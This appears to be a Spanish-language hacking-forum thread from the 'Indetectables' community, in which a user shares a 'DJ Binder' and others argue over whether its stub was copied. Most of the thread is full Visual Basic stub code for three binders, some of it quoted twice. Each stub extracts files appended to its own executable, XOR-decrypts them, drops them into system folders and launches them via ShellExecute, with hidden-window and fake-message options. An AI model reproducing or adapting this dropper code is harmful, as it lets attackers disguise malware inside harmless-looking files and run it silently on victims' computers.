Bueno pues aqui les dejo el source del DJ Binder, espero que le puedan entender al source, estan comentadas la mayoria de las lineas

Recuerden no rippear y dejar un comentario

[Enlace externo eliminado para invitados]

Saludos
¿Si usted muriera hoy esta seguro que iría al cielo?
http://www.antesdelfin.com/salvo.html

© Indetectables Team
Amigo, estuve revisando tu Code y otras personas tambien y resulta, que aunque su cliente cambia un poco su Stub esta basado en el stub del indetectables Bind y Diamond Bind de Sharki, solo has cambiado Nombres de Variables y un poco de orden.

Justificando lo que digo:
Code Tuyo:

Código: Seleccionar todo

Sub Main()
Dim stub As String, i As Integer, hData() As String, hData2() As String, hData3() As String, hXor As New clsXOR
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 '<< Nos auto abrimos
    stub = Space(LOF(1)) '<< Obtenemos los datos de nosotros mismos
     Get #1, , stub '<< Extraemos nuestros propios datos
 Close #1 '<< Nos cerramos
hData() = Split(stub, "[Indetectable[$]]") '<< Separamos los datos con el delimitador [Indetectable[$]]
If hData(1) = "Yes" Then Call MessageFake(hData(2), hData(3), hData(4), hData(5), hData(6)) '<< Ejecuta el message Fake
hData2() = Split(stub, "DARK_J4V13[R]") '<< Separamos los datos con el delimitador DARK_J4V13[R]
For i = 1 To UBound(hData2) '<< Recorremos cada uno de los datos
     hData3() = Split(hData2(i), "DJ Binde[R]") '<< Separamos los datos con el delimitador DJ Binde[R]
    If hData3(4) = "Yes" Then hData3(0) = hXor.DecryptString(hData3(0), "Indetectable[$].net") '<< Desencrypta el archivo
       hData3(2) = Replace(hData3(2), "%", "") '<< Le quitamos el simbolo "%" a las rutas de extraccion
     Open Environ(hData3(2)) & "\" & hData3(1) For Binary As #1 '<< Crea el archivo en la ruta seleccionada y con el nombre de archivo seleccionado
          Put #1, , hData3(0) '<< Metemos los datos del archivo en el nuevo archivo
     Close #1 '<< Cerramos el archivo
     DoEvents '<< Esperamos a que el archivo se cree en caso de ser un archivo muy pesado
      If hData3(3) = "Yes" Then Ejecutar 0, vbNullString, Environ(hData3(2)) & "\" & hData3(1), vbNullString, vbNullString, 1 '<< Ejecutamos el archivo
 Next i '<< Siguiente dato
End Sub
Code Sharki :

Public Sub Main()
  F = FreeFile

Open App.Path & "\" & App.EXEName & ".exe" For Binary As F
   File = Space(LOF(F))
   Get F, , File
  Close F

Dats = Split(File, "%//%")
  For x = 1 To UBound(Dats)
   Arch = Split(Dats(x), "|?|")(0)
   Ext = Split(Dats(x), "|?|")(1)
   Eje = Split(Dats(x), "|?|")(2)
   Mode = Split(Dats(x), "|?|")(3)
   N = N + 1

Call xAction(Arch, Ext, Eje, Mode)
  Next x
End Sub
Ahora coincidencia Adicional con Diamond Binder.

Public Sub Main()
  a1 = FreeFile
  Iam = App.Path & "\" & App.EXEName & ".exe"

Open Iam For Binary As a1
   Stub = Space(LOF(1))
   Get a1, , Stub
  Close a1

If Len(Stub) = 0 Then End
 Delimiter() = Split(Stub, "//DiamondBinder//")
 If UBound(Delimiter) > 0 Then
  For i = 1 To UBound(Delimiter)
    xDelimiter() = Split(Delimiter(i), "//DiamonBinderData//")

If UBound(xDelimiter) > 0 Then
         Archivo = xDelimiter(1)
         Ejecutar = xDelimiter(2)
         Encriptar = xDelimiter(3)
         Extraer = xDelimiter(4)
         Extension = xDelimiter(5)
         Ventana = xDelimiter(6)

If Encriptar = "Si" Then Archivo = Desencriptar("DiamondBinder", Archivo) Else Archivo = Archivo
         If Extraer <> "" Then Carpeta = Environ$(Replace(Extraer, "%", ""))
         Ruta = Carpeta & "\" & i & "." & Extension

Open Ruta For Binary As a1
          Put a1, , Archivo
         Close a1

Select Case Ventana
          Case "Normal": Ventana = vbNormalFocus
          Case "Oculta": Ventana = vbHide
          Case "Minimizada": Ventana = vbMinimized
          Case "Maximizada": Ventana = vbMaximized
         End Select

If Ejecutar = "Si" Then ShellExecute 0, vbNullString, Ruta, vbNullString, vbNullString, Ventana
    End If
  Next i
 End If
End Sub

Su estructura es basicamente la misma, solo se cambiaron variables y algunos names.

Public Declare Function Ejecutar Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Esta estructura tambien fue usada en ambos ya que funcionaria el Stub con extension .DLL

Los Diferencia el Uso de Encryptacion, MsgFake y otras funciones que Agregastes.
A mi parecer es uso de Codigo sin Creditos al autor.

Mi Fin no es hacer peleas ni desmeritar solo aclarar que lo minimo que se merece el autor original es su Nick con creditos.
Jusguen ustedes Mismos...
En tu ventana
Y en tu ventana, gritas al cielo pero lo dices callada..
The Swash escribió:Amigo, estuve revisando tu Code y otras personas tambien y resulta, que aunque su cliente cambia un poco su Stub esta basado en el stub del indetectables Bind y Diamond Bind de Sharki, solo has cambiado Nombres de Variables y un poco de orden.

Justificando lo que digo:
Code Tuyo:

Sub Main()
Dim stub As String, i As Integer, hData() As String, hData2() As String, hData3() As String, hXor As New clsXOR
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 '<< Nos auto abrimos
    stub = Space(LOF(1)) '<< Obtenemos los datos de nosotros mismos
     Get #1, , stub '<< Extraemos nuestros propios datos
 Close #1 '<< Nos cerramos
hData() = Split(stub, "[Indetectable[$]]") '<< Separamos los datos con el delimitador [Indetectable[$]]
If hData(1) = "Yes" Then Call MessageFake(hData(2), hData(3), hData(4), hData(5), hData(6)) '<< Ejecuta el message Fake
hData2() = Split(stub, "DARK_J4V13[R]") '<< Separamos los datos con el delimitador DARK_J4V13[R]
For i = 1 To UBound(hData2) '<< Recorremos cada uno de los datos
     hData3() = Split(hData2(i), "DJ Binde[R]") '<< Separamos los datos con el delimitador DJ Binde[R]
    If hData3(4) = "Yes" Then hData3(0) = hXor.DecryptString(hData3(0), "Indetectable[$].net") '<< Desencrypta el archivo
       hData3(2) = Replace(hData3(2), "%", "") '<< Le quitamos el simbolo "%" a las rutas de extraccion
     Open Environ(hData3(2)) & "\" & hData3(1) For Binary As #1 '<< Crea el archivo en la ruta seleccionada y con el nombre de archivo seleccionado
          Put #1, , hData3(0) '<< Metemos los datos del archivo en el nuevo archivo
     Close #1 '<< Cerramos el archivo
     DoEvents '<< Esperamos a que el archivo se cree en caso de ser un archivo muy pesado
      If hData3(3) = "Yes" Then Ejecutar 0, vbNullString, Environ(hData3(2)) & "\" & hData3(1), vbNullString, vbNullString, 1 '<< Ejecutamos el archivo
 Next i '<< Siguiente dato
End Sub
Code Sharki :

Public Sub Main()
  F = FreeFile

Open App.Path & "\" & App.EXEName & ".exe" For Binary As F
   File = Space(LOF(F))
   Get F, , File
  Close F

Dats = Split(File, "%//%")
  For x = 1 To UBound(Dats)
   Arch = Split(Dats(x), "|?|")(0)
   Ext = Split(Dats(x), "|?|")(1)
   Eje = Split(Dats(x), "|?|")(2)
   Mode = Split(Dats(x), "|?|")(3)
   N = N + 1

Call xAction(Arch, Ext, Eje, Mode)
  Next x
End Sub
Ahora coincidencia Adicional con Diamond Binder.

Public Sub Main()
  a1 = FreeFile
  Iam = App.Path & "\" & App.EXEName & ".exe"

Open Iam For Binary As a1
   Stub = Space(LOF(1))
   Get a1, , Stub
  Close a1

If Len(Stub) = 0 Then End
 Delimiter() = Split(Stub, "//DiamondBinder//")
 If UBound(Delimiter) > 0 Then
  For i = 1 To UBound(Delimiter)
    xDelimiter() = Split(Delimiter(i), "//DiamonBinderData//")

If UBound(xDelimiter) > 0 Then
         Archivo = xDelimiter(1)
         Ejecutar = xDelimiter(2)
         Encriptar = xDelimiter(3)
         Extraer = xDelimiter(4)
         Extension = xDelimiter(5)
         Ventana = xDelimiter(6)

If Encriptar = "Si" Then Archivo = Desencriptar("DiamondBinder", Archivo) Else Archivo = Archivo
         If Extraer <> "" Then Carpeta = Environ$(Replace(Extraer, "%", ""))
         Ruta = Carpeta & "\" & i & "." & Extension

Open Ruta For Binary As a1
          Put a1, , Archivo
         Close a1

Select Case Ventana
          Case "Normal": Ventana = vbNormalFocus
          Case "Oculta": Ventana = vbHide
          Case "Minimizada": Ventana = vbMinimized
          Case "Maximizada": Ventana = vbMaximized
         End Select

If Ejecutar = "Si" Then ShellExecute 0, vbNullString, Ruta, vbNullString, vbNullString, Ventana
    End If
  Next i
 End If
End Sub

Su estructura es basicamente la misma, solo se cambiaron variables y algunos names.

Public Declare Function Ejecutar Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Esta estructura tambien fue usada en ambos ya que funcionaria el Stub con extension .DLL

Los Diferencia el Uso de Encryptacion, MsgFake y otras funciones que Agregastes.
A mi parecer es uso de Codigo sin Creditos al autor.

Mi Fin no es hacer peleas ni desmeritar solo aclarar que lo minimo que se merece el autor original es su Nick con creditos.
Jusguen ustedes Mismos...
WTF! No soy un ripper yo no rippie al diamod binder Bueno pues si dudas pues me avisas cuando quieres que te pase team y te hago uno frente a ti y el que quiera tambien . Ademas otra cosa no sera por casualidad que sharkI y yo aprendimos los dos en un mismo lugar , ademas no crees que sea tan tonto para venir y rippear algo y aun asi liberar el source .

Otra cosa estaba revisando lo que postiastes y mi source no se parese al de sharkI, lo unico que vi que era parecido era que usaba encryptacion XOR y que la api se llamaba ejecutar, pero colocate a revisar otros sources de binders y veras que los nombres de apis se repiten, y la xor cualquiera lo coloca si quisiera le ubiera colocado RC4, cryptapi etc.

Saludos

© Indetectables Team
mmm Mi intencion no es ni sera discutir, tampoco necesitamos que nos demuestres de todas formas pudistes leer el code y hasta juntar maneras pero Bueh, una cosa mas Ni diamond Binder ni Indetectables Binder usan Encryptacion asi que no se parece por ese Punto.
De todas maneras tiene buen stylo el cliente.
Gracias por tu trabajo...
En tu ventana
Y en tu ventana, gritas al cielo pero lo dices callada..
buen binder DARK.

PD: Se como trabaja DARK_J4VI3R, y puedo decir que no es un ripper, ademas de que sabe bastante de programacion en VB, lo a demostrado haciendo varios tutos..

SALUDOS!!
Soy un camaleón, en tu cama, leona ♪
The Swash escribió:mmm Mi intencion no es ni sera discutir, tampoco necesitamos que nos demuestres de todas formas pudistes leer el code y hasta juntar maneras pero Bueh, una cosa mas Ni diamond Binder ni Indetectables Binder usan Encryptacion asi que no se parece por ese Punto.
De todas maneras tiene buen stylo el cliente.
Gracias por tu trabajo...
Bueno pues mi intencion tampoco no es discutir pero bueno por lo que me lo pude haber leido y juntado maneras naa no es mi estilo y si lo fuera si ubiera colocado a sharkI en los comentarios, pero dr_haker me refresco la memoria y buscate por manuales y tutoriales y veras que yo hice un tuto de como crear un joiner

Bueno pues lamento si te ofendi de alguna forma, si lo hice perdoname

Saludos

© Indetectables Team
ukranow escribió:Gracias J4V13R por el source
Gracias por tu comentario bro

Saludos

© Indetectables Team
Responder

Volver a “Otros lenguajes”